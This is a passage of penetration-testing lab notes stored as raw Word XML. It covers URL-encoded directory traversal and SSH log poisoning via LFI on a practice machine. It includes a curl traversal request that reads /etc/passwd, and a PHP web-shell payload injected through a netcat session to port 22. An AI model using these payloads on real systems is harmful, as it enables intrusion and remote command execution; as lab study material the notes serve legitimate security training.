      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, also called </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Percent Encoding</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, to potentially bypass these filters. We can leverage specific</w:t>
      </w:r>
      <w:hyperlink r:id="rId574">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId575">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ASCII encoding lists</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to manually encode our query from listing 11 or use the online converter on the same page. For now, we will only encode the dots, which are represented as "%2e".</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2171700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="533" name="image516.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image516.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId576"/>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CE5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">curl http://192.168.50.16/cgi-bin/%2e%2e/%2e%2e/%2e%2e/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="944"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e/etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE7">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE8">
      <w:pPr>
        <w:spacing w:after="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We have successfully used directory traversal with encoded dots to display the contents of </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/etc/passwd</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> on the target machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CE9">
      <w:pPr>
        <w:spacing w:after="240" w:before="240" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Generally, URL encoding is used to convert characters of a web request into a format that can be transmitted over the internet. However, it is also a popular method used for malicious purposes. The reason for this is that the encoded representation of characters in a request may be missed by filters, which only check for the plain-text representation of them e.g. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> but not </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">%2e%2e/</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. After the request passes the filter, the web application or server interprets the encoded characters as a valid request.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CEA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CEB">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CEC">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CED">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001C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CEF">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_dr61fk3r1e6z" w:id="240"/>
      <w:bookmarkEnd w:id="240"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log Poisoning via LFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF1">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF2">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">In the </w:t>
      </w:r>
      <w:hyperlink r:id="rId577">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Ha-natraj</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PG Play, we got LFI and then we used Log Poisoning to get foothold</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF3">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF4">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF5">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">auth.log:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: The auth.log file on Linux systems records authentication-related events.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents: It includes information about login attempts, both successful and failed, as well as activities related to authentication mechanisms (e.g., sudo usage).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: Commonly found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/auth.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (on Debian-based systems) or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/secure </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">(on Red Hat-based systems).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CF9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1403"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: Used by administrators to monitor and investigate authentication issues, detect unauthorized access attempts, and ensure system security.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CFA">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CFB">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access.log:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CFC">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Purpose: The access.log file records all requests made to a web server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CFD">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Contents: It contains details such as the client's IP address, request method (GET, POST, etc.), requested URL, HTTP status code, and user agent.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CFE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Location: Typically found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/apache2/access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Apache or </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/log/nginx/access.log</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> for Nginx.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001CFF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="349"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Usage: Used by web administrators to analyze traffic, monitor server activity, troubleshoot issues, and enhance security by detecting unusual access patterns.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D00">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D01">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Poisoning the logs can give you a shell on the system depending on the language used on the backend in this case I saw that PHP was being used by checking out my Wappalyzer browser extension which is a great tool for web engagements.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D02">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D03">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_9nockyiwfpd9" w:id="241"/>
      <w:bookmarkEnd w:id="241"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploiting auth.log</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D04">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D05">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I tried accessing the access.log file and had no luck so I moved on to auth.log and was able to view its contents this means we are going to go with SSH log-poisoning techniques.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D06">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D07">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2768600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="346" name="image359.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image359.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId578"/>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1D08">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D09">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">I chased my tail around for a while to get a working exploit because some of the methods used for this are outdated. I connected to the port using Netcat and injected a PHP command.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0A">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0B">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nc -nv 192.168.167.80 22</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1493"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is SSH (port 22)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0D">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0E">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Then type this in NC sesson:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D0F">
      <w:pPr>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sinner/&lt;?php passthru($_GET['cmd']); ?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00001D10">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="856"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
